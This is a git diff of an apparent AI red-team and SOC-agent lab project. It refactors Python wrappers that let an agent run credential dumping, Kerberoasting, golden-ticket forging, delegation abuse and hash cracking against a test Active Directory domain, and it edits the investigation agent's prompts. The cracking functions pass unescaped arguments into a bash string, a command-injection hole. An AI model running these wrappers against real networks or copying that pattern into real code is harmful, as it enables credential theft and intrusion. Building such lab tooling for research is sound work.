>>> result = nmap_scan("192.168.1.2 192.168.1.3 192.168.1.4")
"""
- cmd = ["nmap", "-T4", "-sS", "-sV", "--open"] + target.split(" ")
+ cmd = ["nmap", "-T4", "-sV", "--open"] + target.split(" ")
try:
logger.info(f"[*] Scanning targets: {target}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=300)
+ stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=300)
- if result.returncode != 0:
- logger.error(f"[!] Nmap scan failed: {result.stderr}")
- return result.stderr
+ if returncode != 0:
+ logger.error(f"[!] Nmap scan failed: {stderr}")
+ return stderr or f"Nmap scan failed with code {returncode}"
logger.info(f"[*] Nmap scan completed for target {target}")
@@ -75,11 +89,8 @@ def nmap_scan(self, target: str) -> str:
for ip in target.split():
self.state.queried_hosts.add(ip)
- return result.stdout
+ return stdout
- except subprocess.TimeoutExpired:
- logger.error("Nmap scan timed out after 5 minutes")
- return "Nmap scan timed out after 5 minutes"
except Exception as e:
logger.error(f"Scan failed: {e!s}")
return f"Scan failed: {e!s}"
@@ -118,15 +129,13 @@ def enumerate_users(self, target: str, username: str, password: str, domain: str
cmd.append("--users")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
logger.info(
f"[*] User enumeration completed for {target} (user:{username}, domain:{domain})"
)
- return result.stdout
+ return stdout or stderr
- except subprocess.TimeoutExpired:
- return f"User enumeration timed out for {target}"
except Exception as e:
logger.error(f"User enumeration failed: {e}")
return f"User enumeration failed for {target}: {e}"
@@ -165,13 +174,11 @@ def enumerate_shares(
cmd.append("--shares")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
logger.info(f"[*] Share enumeration completed for {target}")
- return result.stdout
+ return stdout or stderr
- except subprocess.TimeoutExpired:
- return f"Share enumeration timed out for {target}"
except Exception as e:
logger.error(f"Share enumeration failed: {e}")
return f"Share enumeration failed for {target}: {e}"
@@ -186,6 +193,27 @@ def set_state(self, state: RedTeamState) -> None:
"""Set the operation state for this toolset."""
self.state = state
+ def _check_smb_connectivity(self, target: str, timeout_seconds: int = 5) -> tuple[bool, str]:
+ """Check if SMB port 445 is reachable on target.
+
+ Args:
+ target: Target IP address
+ timeout_seconds: Connection timeout for nc command
+
+ Returns:
+ Tuple of (is_reachable, error_message)
+ """
+ cmd = ["nc", "-zv", "-w", str(timeout_seconds), target, "445"]
+ try:
+ # AWS SSM has a minimum timeout of 30 seconds
+ ssm_timeout = max(30, timeout_seconds + 5)
+ stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=ssm_timeout)
+ if returncode == 0:
+ return True, ""
+ return False, f"SMB port 445 not reachable: {stderr or stdout}"
+ except Exception as e:
+ return False, f"Connectivity check failed: {e}"
+
@dn.tool_method
def secretsdump(
self,
@@ -194,8 +222,11 @@ def secretsdump(
password: str | None = None,
hash: str | None = None,
domain: str | None = None,
+ dc_ip: str | None = None,
no_pass: bool = False,
- timeout_minutes: int = 10,
+ timeout_minutes: int = 3,
+ connection_timeout: int = 30,
+ skip_connectivity_check: bool = False,
) -> str:
"""
Extract secrets using impacket-secretsdump for credential harvesting.
@@ -210,18 +241,32 @@ def secretsdump(
password: Password for the username (optional)
hash: NTLM hash for pass-the-hash authentication (optional)
domain: Domain name (optional, can be inferred)
+ dc_ip: Domain controller IP address (recommended for DC targets to avoid DNS issues)
no_pass: If True, use Kerberos golden ticket authentication
- timeout_minutes: Maximum time to spend dumping (default: 10)
+ timeout_minutes: Maximum time to spend dumping (default: 3)
+ connection_timeout: Timeout for initial SMB connection in seconds (default: 30)
+ skip_connectivity_check: Skip the SMB port check (default: False)
Returns:
Extracted credentials including NTLM hashes, Kerberos keys, and secrets
Example:
>>> secretsdump("192.168.1.100", "Administrator", password="P@ssw0rd") # pragma: allowlist secret
- >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN")
+ >>> secretsdump("192.168.1.100", "Administrator", hash="aad3b4...", domain="DOMAIN", dc_ip="192.168.1.100")
>>> secretsdump("domain.local", "Administrator", no_pass=True) # golden ticket
"""
- cmd = ["/usr/bin/impacket-secretsdump"]
+ # Pre-check SMB connectivity to fail fast
+ if not skip_connectivity_check:
+ is_reachable, error_msg = self._check_smb_connectivity(target)
+ if not is_reachable:
+ return f"[!] Target {target} is not reachable on SMB port 445. {error_msg}"
+
+ # Use timeout command to enforce connection-level timeout
+ cmd = ["timeout", str(connection_timeout), "impacket-secretsdump"]
+
+ # Add dc-ip flag if provided (helps avoid DNS resolution hangs)
+ if dc_ip:
+ cmd.extend(["-dc-ip", dc_ip])
if password and domain:
target_string = f"{domain}/{username}:{password}@{target}"
@@ -241,27 +286,22 @@ def secretsdump(
cmd.append(target_string)
+ # For golden ticket auth, set KRB5CCNAME in the command
+ if no_pass:
+ cmd = ["env", "KRB5CCNAME=Administrator.ccache"] + cmd
+
try:
logger.info(f"[*] Running secretsdump on {target} with {username}")
- env = os.environ.copy() if no_pass else None
- if no_pass and env is not None:
- env["KRB5CCNAME"] = "Administrator.ccache"
-
- result = subprocess.run(
- cmd,
- check=False,
- capture_output=True,
- text=True,
- timeout=timeout_minutes * 60,
- env=env,
- )
+ stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=timeout_minutes * 60)
+
+ # Check for timeout exit code (124 from timeout command)
+ if returncode == 124:
+ return f"[!] Secretsdump timed out after {connection_timeout}s connecting to {target}. Target may be unreachable or credentials invalid."
logger.info(f"[*] Secretsdump completed for {target}")
- return result.stdout
+ return stdout or stderr or f"Secretsdump returned code {returncode}"
- except subprocess.TimeoutExpired:
- return "[!] Secretsdump timed out"
except Exception as e:
return f"[!] Secretsdump error: {e}"
@@ -293,7 +333,7 @@ def kerberoast(
>>> kerberoast("example.local", "user", "pass", "192.168.1.100")
"""
cmd = [
- "/usr/bin/impacket-GetUserSPNs",
+ "impacket-GetUserSPNs",
f"{domain}/{username}:{password}",
"-dc-ip",
dc_ip,
@@ -302,11 +342,9 @@ def kerberoast(
try:
logger.info(f"[*] Kerberoasting {domain} using {username}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60)
- return result.stdout
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60)
+ return stdout or stderr
- except subprocess.TimeoutExpired:
- return "Error: Kerberoasting timed out"
except Exception as e:
return f"Kerberoasting failed: {e!s}"
@@ -338,7 +376,7 @@ def asrep_roast(
>>> asrep_roast("example.local", "user", "pass", "192.168.1.100")
"""
cmd = [
- "/usr/bin/impacket-GetNPUsers",
+ "impacket-GetNPUsers",
f"{domain}/{username}:{password}",
"-dc-ip",
dc_ip,
@@ -347,11 +385,9 @@ def asrep_roast(
try:
logger.info(f"[*] AS-REP roasting {domain} using {username}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60)
- return result.stdout
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60)
+ return stdout or stderr
- except subprocess.TimeoutExpired:
- return "Error: AS-REP roasting timed out"
except Exception as e:
return f"AS-REP roasting failed: {e!s}"
@@ -397,19 +433,15 @@ def domain_admin_checker(
cmd.extend(["-x", "whoami"])
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
- output = ""
- if result.stdout:
- output += result.stdout
- if result.stderr:
- output += "\n" + result.stderr if output else result.stderr
+ output = stdout
+ if stderr:
+ output += "\n" + stderr if output else stderr
logger.info(f"[*] Domain admin check completed for {targets}")
return output
- except subprocess.TimeoutExpired:
- return f"Domain admin checker timed out for {targets}"
except Exception as e:
logger.error(f"Domain admin checker failed: {e}")
return f"Domain admin checker failed: {e}"
@@ -458,57 +490,30 @@ def crack_with_hashcat(
"""
output = "[*] Starting hashcat...\n"
- try:
- with tempfile.NamedTemporaryFile(mode="w", suffix=".hash", delete=False) as hash_file:
- hash_file.write(hash_value)
- hash_file_path = hash_file.name
-
- try:
- cmd = [
- "hashcat",
- "-m",
- str(hashcat_mode),
- "-a",
- "0",
- hash_file_path,
- wordlist_path,
- "--runtime",
- str(max_time_minutes * 60),
- "--force",
- ]
-
- _result = subprocess.run(
- cmd,
- check=False,
- capture_output=True,
- text=True,
- timeout=(max_time_minutes * 60) + 30,
- )
+ # Create hash file remotely and run hashcat
+ hash_file_path = f"/tmp/hash_{time.time()}.hash" # noqa: S108 # nosec B108
- show_cmd = ["hashcat", "-m", str(hashcat_mode), hash_file_path, "--show"]
-
- show_result = subprocess.run(
- show_cmd,
- check=False,
- capture_output=True,
- text=True,
- timeout=30,
- )
-
- if show_result.stdout.strip():
- output += "\n✓ CRACKED PASSWORDS:\n" + show_result.stdout
- logger.info("[+] Hashcat successfully cracked hash")
- else:
- output += "\n✗ No passwords cracked"
+ try:
+ # Write hash to remote file and run hashcat
+ cmd = f"""
+echo '{hash_value}' > {hash_file_path}
+hashcat -m {hashcat_mode} -a 0 {hash_file_path} {wordlist_path} --runtime {max_time_minutes * 60} --force 2>&1 || true
+hashcat -m {hashcat_mode} {hash_file_path} --show 2>&1
+rm -f {hash_file_path}
+"""
+ stdout, stderr, _ = _run_tool(
+ ["bash", "-c", cmd],
+ timeout_seconds=(max_time_minutes * 60) + 60,
+ )
- return output
+ if stdout and ":" in stdout:
+ output += "\n✓ CRACKED PASSWORDS:\n" + stdout
+ logger.info("[+] Hashcat successfully cracked hash")
+ else:
+ output += "\n✗ No passwords cracked\n" + (stdout or stderr)
- finally:
- if os.path.exists(hash_file_path):
- os.unlink(hash_file_path)
+ return output
- except subprocess.TimeoutExpired:
- return output + "\nError: Hashcat timed out"
except Exception as e:
return output + f"\nError: {e!s}"
@@ -546,65 +551,30 @@ def crack_with_john(
"""
output = "[*] Starting John the Ripper...\n"
- try:
- with tempfile.NamedTemporaryFile(mode="w", suffix=".hash", delete=False) as hash_file:
- hash_file.write(hash_value)
- hash_file_path = hash_file.name
-
- try:
- session_name = f"john_session_{int(time.time())}"
- cmd = [
- "john",
- "--wordlist=" + wordlist_path,
- "--format=" + hash_format,
- hash_file_path,
- "--session=" + session_name,
- ]
-
- subprocess.run(
- cmd,
- check=False,
- capture_output=True,
- text=True,
- timeout=(max_time_minutes * 60) + 30,
- )
-
- show_cmd = ["john", "--show", "--format=" + hash_format, hash_file_path]
-
- show_result = subprocess.run(
- show_cmd,
- check=False,
- capture_output=True,
- text=True,
- timeout=30,
- )
+ hash_file_path = f"/tmp/john_hash_{time.time()}.hash" # noqa: S108 # nosec B108
+ session_name = f"john_session_{int(time.time())}"
- if show_result.stdout.strip():
- output += "\n✓ CRACKED PASSWORDS:\n" + show_result.stdout
- logger.info("[+] John successfully cracked hash")
- else:
- output += "\n✗ No passwords cracked"
+ try:
+ # Write hash to remote file and run john
+ cmd = f"""
+echo '{hash_value}' > {hash_file_path}
+john --wordlist={wordlist_path} --format={hash_format} {hash_file_path} --session={session_name} 2>&1 || true
+john --show --format={hash_format} {hash_file_path} 2>&1
+rm -f {hash_file_path} {session_name}.pot {session_name}.rec {session_name}.log
+"""
+ stdout, stderr, _ = _run_tool(
+ ["bash", "-c", cmd],
+ timeout_seconds=(max_time_minutes * 60) + 60,
+ )
- return output
+ if stdout and ":" in stdout:
+ output += "\n✓ CRACKED PASSWORDS:\n" + stdout
+ logger.info("[+] John successfully cracked hash")
+ else:
+ output += "\n✗ No passwords cracked\n" + (stdout or stderr)
- finally:
- if os.path.exists(hash_file_path):
- os.unlink(hash_file_path)
+ return output
- session_files = [
- f"{session_name}.pot",
- f"{session_name}.rec",
- f"{session_name}.log",
- ]
- for session_file in session_files:
- if os.path.exists(session_file):
- try:
- os.unlink(session_file)
- except Exception:
- pass
-
- except subprocess.TimeoutExpired:
- return output + "\nError: John the Ripper timed out"
except Exception as e:
return output + f"\nError: {e!s}"
@@ -658,17 +628,14 @@ def enumerate_share_files(
]
logger.info(f"[*] Enumerating files in {share_path}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=120)
- if result.returncode != 0:
- logger.error(f"[!] Failed to list files: {result.stderr}")
- return f"Failed to list files: {result.stderr}"
+ if returncode != 0:
+ logger.error(f"[!] Failed to list files: {stderr}")
+ return f"Failed to list files: {stderr}"
- return result.stdout
+ return stdout
- except subprocess.TimeoutExpired:
- logger.error(f"[!] File enumeration timed out for {share_path}")
- return "File enumeration timed out"
except Exception as e:
logger.error(f"[!] Error during enumeration: {e!s}")
return f"Error during enumeration: {e!s}"
@@ -719,13 +686,13 @@ def download_file_content(
]
logger.info(f"[*] Downloading {file_path} from {share_path}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60)
+ stdout, stderr, returncode = _run_tool(cmd, timeout_seconds=60)
- if result.returncode != 0:
- logger.error(f"[!] Failed to download file: {result.stderr}")
- return f"Failed to download file: {result.stderr}"
+ if returncode != 0:
+ logger.error(f"[!] Failed to download file: {stderr}")
+ return f"Failed to download file: {stderr}"
- content = result.stdout
+ content = stdout
logger.info(f"[+] Downloaded {len(content)} bytes from {file_path}")
# Log that share was accessed
@@ -734,9 +701,6 @@ def download_file_content(
return content
- except subprocess.TimeoutExpired:
- logger.error(f"[!] File download timed out for {file_path}")
- return "File download timed out"
except Exception as e:
logger.error(f"[!] Error downloading file: {e!s}")
return f"Error downloading file: {e!s}"
@@ -787,11 +751,9 @@ def get_sid(
logger.info(f"[*] Getting SID for {domain} using {username}")
try:
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
logger.info(f"[*] SID lookup completed for {domain}")
- return result.stdout
- except subprocess.TimeoutExpired:
- return "Error: SID lookup timed out"
+ return stdout or stderr
except Exception as e:
return f"Error: {e!s}"
@@ -847,7 +809,7 @@ def generate_golden_ticket(
try:
logger.info("[*] Generating golden ticket for Administrator")
logger.info(f"[*] Domain: {domain}, SID: {domain_sid}, Extra SID: {extra_sid}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
if self.state:
self.state.has_golden_ticket = True
@@ -862,9 +824,7 @@ def generate_golden_ticket(
)
self.state.timeline.append(event)
- return result.stdout
- except subprocess.TimeoutExpired:
- return "Error: Golden ticket generation timed out"
+ return stdout or stderr
except Exception as e:
return f"Error: {e!s}"
@@ -925,13 +885,11 @@ def run_bloodhound(
try:
logger.info(f"[*] Running BloodHound collection for {domain}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=600)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=600)
logger.info("[+] BloodHound collection completed")
- return result.stdout + "\n" + result.stderr
+ return stdout + "\n" + (stderr or "")
- except subprocess.TimeoutExpired:
- return "BloodHound collection timed out after 10 minutes"
except Exception as e:
logger.error(f"BloodHound failed: {e}")
return f"BloodHound failed: {e}"
@@ -993,15 +951,13 @@ def certipy_find(
try:
logger.info(f"[*] Enumerating ADCS for {domain}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=300)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=300)
- if "ESC" in result.stdout:
+ if "ESC" in stdout:
logger.warning("[!] VULNERABLE CERTIFICATE TEMPLATES FOUND!")
- return result.stdout + "\n" + result.stderr
+ return stdout + "\n" + (stderr or "")
- except subprocess.TimeoutExpired:
- return "Certipy enumeration timed out"
except Exception as e:
return f"Certipy enumeration failed: {e}"
@@ -1058,15 +1014,13 @@ def certipy_req_esc1(
try:
logger.info(f"[*] Requesting certificate for {target_upn} via ESC1")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
- if "saved" in result.stdout.lower():
+ if "saved" in stdout.lower():
logger.info("[+] Certificate obtained! Use certipy_auth next.")
- return result.stdout + "\n" + result.stderr
+ return stdout + "\n" + (stderr or "")
- except subprocess.TimeoutExpired:
- return "Certificate request timed out"
except Exception as e:
return f"Certificate request failed: {e}"
@@ -1092,15 +1046,13 @@ def certipy_auth(self, pfx_path: str, dc_ip: str) -> str:
try:
logger.info("[*] Authenticating with certificate")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60)
- if "hash" in result.stdout.lower():
+ if "hash" in stdout.lower():
logger.info("[+] NTLM hash obtained! Run domain_admin_checker.")
- return result.stdout + "\n" + result.stderr
+ return stdout + "\n" + (stderr or "")
- except subprocess.TimeoutExpired:
- return "Certificate authentication timed out"
except Exception as e:
return f"Certificate authentication failed: {e}"
@@ -1151,10 +1103,8 @@ def find_delegation(
try:
logger.info(f"[*] Searching for delegation in {domain}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
- return result.stdout
- except subprocess.TimeoutExpired:
- return "Delegation search timed out"
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
+ return stdout or stderr
except Exception as e:
return f"Delegation search failed: {e}"
@@ -1200,11 +1150,9 @@ def add_computer(
try:
logger.info(f"[*] Adding computer account {computer_name}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=60)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=60)
logger.info(f"[+] Computer account {computer_name}$ created")
- return result.stdout
- except subprocess.TimeoutExpired:
- return "Computer account creation timed out"
+ return stdout or stderr
except Exception as e:
return f"Computer account creation failed: {e}"
@@ -1252,11 +1200,9 @@ def rbcd_write(
try:
logger.info(f"[*] Configuring RBCD: {delegate_from} -> {delegate_to}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
logger.info("[+] RBCD configured - use get_st next")
- return result.stdout
- except subprocess.TimeoutExpired:
- return "RBCD configuration timed out"
+ return stdout or stderr
except Exception as e:
return f"RBCD configuration failed: {e}"
@@ -1302,14 +1248,12 @@ def get_st(
try:
logger.info(f"[*] Requesting ST for {target_spn} as {impersonate_user}")
- result = subprocess.run(cmd, check=False, capture_output=True, text=True, timeout=120)
+ stdout, stderr, _ = _run_tool(cmd, timeout_seconds=120)
- if ".ccache" in result.stdout:
+ if ".ccache" in stdout:
logger.info("[+] Ticket obtained! Export KRB5CCNAME and use secretsdump -k")
- return result.stdout
- except subprocess.TimeoutExpired:
- return "Service ticket request timed out"
+ return stdout or stderr
except Exception as e:
return f"Service ticket request failed: {e}"
@@ -1449,11 +1393,67 @@ def record_finding(
return f"✓ Recorded share: {share.name} on {share.host}"
if finding_type == "admin_access":
+ details = data.get("details", "")
+
+ # Validate that this is actually a success, not an error being misreported
+ error_indicators = [
+ "not found",
+ "not available",
+ "not installed",
+ "not in path",
+ "missing",
+ "failed",
+ "error",
+ "cannot",
+ "unable",
+ "timed out",
+ "timeout",
+ "not properly configured",
+ "command not found",
+ "no such file",
+ "permission denied",
+ ]
+ details_lower = details.lower()
+
+ for indicator in error_indicators:
+ if indicator in details_lower:
+ logger.warning(
+ f"[!] Rejecting admin_access finding - details contain error indicator '{indicator}': {details[:200]}"
+ )
+ return (
+ f"[!] REJECTED: Cannot record admin_access with error details. "
+ f"The details contain '{indicator}' which indicates a failure, not success. "
+ f"Only call record_finding('admin_access') when you have CONFIRMED admin access "
+ f"(e.g., 'Pwn3d!' in netexec output, successful secretsdump, etc.). "
+ f"If tools are missing or not working, troubleshoot the environment first."
+ )
+
+ # Require some positive indicator of success
+ success_indicators = [
+ "pwn3d",
+ "admin",
+ "success",
+ "authenticated",
+ "dumped",
+ "obtained",
+ ]
+ has_success_indicator = any(ind in details_lower for ind in success_indicators)
+
+ if not has_success_indicator and len(details) > 0:
+ logger.warning(
+ f"[!] Admin access claim lacks success indicators: {details[:200]}"
+ )
+ return (
+ "[!] REJECTED: admin_access finding should include evidence of success "
+ "(e.g., 'Pwn3d!' output, successful authentication, dumped credentials). "
+ "Provide specific details showing HOW admin access was confirmed."
+ )
+
self.state.has_domain_admin = True
event = TimelineEvent(
id=f"evt-{len(self.state.timeline):04d}",
timestamp=datetime.now(timezone.utc),
- description=f"Domain admin access achieved: {data.get('details', '')}",
+ description=f"Domain admin access achieved: {details}",
mitre_techniques=["T1078.002"], # Domain Accounts
confidence=1.0,
source="domain_admin_checker",
diff --git a/templates/agent/initial_alert_prompt.md.jinja b/templates/agent/initial_alert_prompt.md.jinja
index 6c23cb89..3293af07 100644
--- a/templates/agent/initial_alert_prompt.md.jinja
+++ b/templates/agent/initial_alert_prompt.md.jinja
@@ -104,11 +104,25 @@ mcp__grafana__query_loki_logs(
If no results, try broader queries but ALWAYS use the time range above.
**CRITICAL**: After EVERY query (whether it returns results or not), you MUST:
-1. If results found: Call record_evidence() for EACH user/host/IP/process/finding
+1. If results found: **PARSE THE JSON** and call record_evidence() for EACH user/host/IP/process found
2. If NO results: Document this and either try a broader query OR move forward with get_combined_questions()
3. DO NOT query multiple times without calling record_evidence() or get_combined_questions()
-**YOU ARE STUCK IN A LOOP IF**: You make 3+ queries without calling record_evidence() or get_combined_questions()
+**YOU ARE STUCK IN A LOOP IF**: You make 2+ queries without calling record_evidence()
+
+## How to Parse Query Results
+
+Loki returns JSON like this:
+```json
+{"line": "{\"computer\":\"winterfell.north.sevenkingdoms.local\", \"event_data\":\"robb.stark10.0.4.186\"}"}
+```
+
+**EXTRACT AND RECORD:**
+- `computer` field → record_evidence(evidence_type="hostname", value="winterfell...")
+- `TargetUserName` from event_data → record_evidence(evidence_type="user", value="robb.stark")
+- `IpAddress` from event_data → record_evidence(evidence_type="ip", value="10.0.4.186")
+
+**DO NOT** re-run the same query. **DO** parse results and extract IOCs.
---
@@ -161,12 +175,10 @@ If no results, try broader queries but ALWAYS use the time range above.
18. ☐ Call transition_stage("synthesis")
### Stage 4: SYNTHESIS
-19. ☐ Call complete_investigation() with ALL required fields
-
-**DO NOT complete the investigation until you have:**
-- Identified specific affected hosts (including ALL domain controllers)
-- Identified ALL compromised user accounts
-- Investigated precursor techniques (enumeration, credential access)
-- Created a complete timeline from initial access to detected attack
-- Recorded at least 5 evidence items covering the full attack chain
-- Mapped the attack to multiple MITRE techniques (not just the alert technique)
+19. ☐ Call complete_investigation(summary="...") with a summary of your findings
+
+**Complete the investigation when you have:**
+- Investigated the alert and recorded evidence
+- Identified affected hosts and users
+- Built a timeline of events
+- Can provide recommendations
diff --git a/templates/agent/system_instructions.md.jinja b/templates/agent/system_instructions.md.jinja
index 8f073c9a..044d99a4 100644
--- a/templates/agent/system_instructions.md.jinja
+++ b/templates/agent/system_instructions.md.jinja
@@ -1,6 +1,22 @@
You are Ares, an autonomous SOC investigation agent. Your mission is to investigate
-security alerts and produce actionable threat intelligence through systematic,
-question-driven investigation.
+security alerts and produce actionable threat intelligence.
+
+## 🛑 CRITICAL: COMPLETE QUICKLY
+
+**You have LIMITED steps. Do NOT loop endlessly on queries.**
+
+1. Query logs (2-3 queries max)
+2. Record any findings with record_evidence()
+3. Call complete_investigation(summary="...") with your findings
+
+If queries return empty results, that IS a finding. Complete with:
+```
+complete_investigation(summary="Investigated [alert]. No matching events found in logs.
+Recommend continued monitoring. Confidence: Low - no data to confirm or deny.")
+```
+
+**ANTI-PATTERN**: Making 3+ queries without calling complete_investigation()
+**CORRECT PATTERN**: Query → Record findings → Complete
## Core Investigation Philosophy
@@ -95,16 +111,51 @@ The alert's `startsAt` timestamp is likely STALE. The initial prompt provides:
**DO NOT skip this stage. If you only detect the final attack without precursors,
your investigation is INCOMPLETE.**
-### Stage 3: LATERAL (What is the SCOPE?)
+### Stage 3: LATERAL (What is the SCOPE?) - CRITICAL FOR HIGH/CRITICAL ALERTS
+
+For HIGH and CRITICAL severity alerts, you MUST perform lateral investigation.
+
1. Call get_combined_questions() for scope questions
-2. Use track_host_investigation() and track_user_investigation()
-3. Check these dimensions in PARALLEL:
+2. Use track_host_investigation() and track_user_investigation() for EACH entity
+3. **MANDATORY LATERAL QUERIES:**
+
+**For each user discovered:**
+```
+{job=~".+"} |~ "(?i)"
+```
+- What other hosts did this user access?
+- What other activities did this user perform?
+- Were there failed login attempts before success?
+
+**For each host discovered:**
+```
+{job=~".+"} |~ "(?i)"
+```
+- What other users logged into this host?
+- What processes were executed on this host?
+- What network connections were made?
+
+**For each IP discovered:**
+```
+{job=~".+"} |~ ""
+```
+- What other hosts communicated with this IP?
+- What services were accessed from this IP?
+- Is this IP associated with multiple users?
+
+4. Check these dimensions in PARALLEL:
- Same host: What else is this host doing?
- Same user: Where else has this user been?
- Same indicators: Where else do these IOCs appear?
- Same timeframe: What else happened during this window?
-4. Expand or contract scope based on findings
-5. Call transition_stage("synthesis")
+
+5. **Build a scope map:**
+ - List ALL compromised/affected hosts
+ - List ALL compromised/affected users
+ - Identify the attack origin point
+ - Identify the furthest point of lateral movement
+
+6. Call transition_stage("synthesis")
### Stage 4: SYNTHESIS (Generate report)
1. Call get_investigation_summary() to review findings
@@ -246,7 +297,28 @@ data sources. These tools include:
- Check stats before running large queries
- Prefer MCP tools when available as they're more reliable than HTTP API calls
-## Evidence Recording
+## Evidence Recording (CRITICAL - DO NOT SKIP)
+
+**You MUST extract and record ALL IOCs from query results.** For EVERY finding, call record_evidence().
+
+### IOC Extraction Checklist
+
+When you get query results, extract and record EACH of these:
+
+| IOC Type | What to Look For | Pyramid Level |
+|----------|------------------|---------------|
+| **ip** | Source IPs, destination IPs, client IPs | 2 |
+| **user** | Usernames, account names, service accounts | 4 |
+| **hostname** | Computer names, server names, DC names | 4 |
+| **domain** | Domain names, FQDNs | 3 |
+| **process** | Process names, command lines | 4 |
+| **file** | File paths, file names | 4 |
+| **hash** | MD5, SHA1, SHA256 hashes | 1 |
+| **artifact** | Registry keys, scheduled tasks, services | 4 |
+| **tool** | Attack tools (mimikatz, rubeus, etc.) | 5 |
+| **technique** | MITRE ATT&CK technique ID | 6 |
+
+### record_evidence() Parameters
For EVERY finding, call record_evidence() with:
1. evidence_type: ip, domain, hash, process, user, file, artifact, tool, technique
@@ -256,14 +328,202 @@ For EVERY finding, call record_evidence() with:
5. pyramid_level: 1-6 (6 = TTP, the goal!)
6. mitre_techniques: List of technique IDs if known
+### Example: Extracting IOCs from DCSync Detection
+
+If you find a DCSync event, record MULTIPLE evidence items:
+
+```python
+# Record the technique (level 6 - TTP)
+record_evidence(
+ evidence_type="technique",
+ value="T1003.006 - DCSync",
+ source="Loki query: Event 4662",
+ timestamp="2026-01-10T14:30:00Z",
+ pyramid_level=6,
+ mitre_techniques=["T1003.006"]
+)
+
+# Record the attacking user (level 4)
+record_evidence(
+ evidence_type="user",
+ value="robb.stark",
+ source="Event 4662 SubjectUserName field",
+ timestamp="2026-01-10T14:30:00Z",
+ pyramid_level=4,
+ mitre_techniques=["T1003.006"]
+)
+
+# Record the source host (level 4)
+record_evidence(
+ evidence_type="hostname",
+ value="winterfell.north.sevenkingdoms.local",
+ source="Event 4662 SubjectLogonId correlated with 4624",
+ timestamp="2026-01-10T14:30:00Z",
+ pyramid_level=4,
+ mitre_techniques=["T1003.006"]
+)
+
+# Record the source IP (level 2)
+record_evidence(
+ evidence_type="ip",
+ value="10.0.4.186",
+ source="Event 4624 IpAddress field",
+ timestamp="2026-01-10T14:30:00Z",
+ pyramid_level=2,
+ mitre_techniques=["T1003.006"]
+)
+```
+
+**DO NOT just record the technique - record ALL associated IOCs!**
+
+## Parsing Loki Query Results (CRITICAL)
+
+Loki returns structured JSON with embedded Windows Event data. You MUST parse these results.
+
+### Loki Response Structure
+
+Each result contains:
+```json
+{
+ "timestamp": "...",
+ "line": "{\"computer\":\"hostname\", \"event_id\":4624, \"event_data\":\"...\"}",
+ "labels": {"host": "...", "deployment": "..."}
+}
+```
+
+### Extracting IOCs from Results
+
+**Step 1: Parse the `line` field as JSON**
+The `line` field contains the actual log entry with:
+- `computer`: The hostname (e.g., "winterfell.north.sevenkingdoms.local")
+- `event_id`: Windows Event ID
+- `event_data`: XML containing user/IP/SID data
+- `message`: Human-readable event description
+
+**Step 2: Extract from `event_data` XML**
+Look for these XML patterns:
+- `username` → Record as user
+- `username` → Record as user
+- `10.0.4.186` → Record as IP
+- `hostname` → Record as hostname
+- `DOMAIN` → Record as domain
+- `C:\path\exe` → Record as process
+
+**Step 3: Extract from `labels`**
+- `host`: Source hostname
+- `computer`: Full FQDN
+- `deployment`: Environment identifier
+
+### Example: Parsing a 4624 Logon Event
+
+If query returns:
+```
+computer: winterfell.north.sevenkingdoms.local
+event_data: robb.stark
+ 10.0.4.186
+```
+
+You MUST call:
+```python
+record_evidence(evidence_type="hostname", value="winterfell.north.sevenkingdoms.local", ...)
+record_evidence(evidence_type="user", value="robb.stark", ...)
+record_evidence(evidence_type="ip", value="10.0.4.186", ...)
+```
+
+### Common Windows Event Fields by Event ID
+
+| Event ID | Key Fields to Extract |
+|----------|----------------------|
+| 4624 (Logon) | TargetUserName, IpAddress, WorkstationName, LogonType |
+| 4625 (Failed Logon) | TargetUserName, IpAddress, FailureReason |
+| 4662 (Object Access) | SubjectUserName, ObjectName, AccessMask |
+| 4728/4732 (Group Add) | MemberName, TargetUserName (group), SubjectUserName |
+| 4768 (TGT Request) | TargetUserName, IpAddress, ServiceName |
+| 4769 (TGS Request) | TargetUserName, ServiceName, IpAddress, TicketEncryptionType |
+
+**ANTI-PATTERN**: Getting query results and immediately querying again without extracting IOCs
+**CORRECT PATTERN**: Get results → Parse JSON → Extract each IOC → record_evidence() for each → Then query again if needed
+
## Completion Criteria
-Call complete_investigation() when:
-1. get_combined_questions() returns no high-priority questions
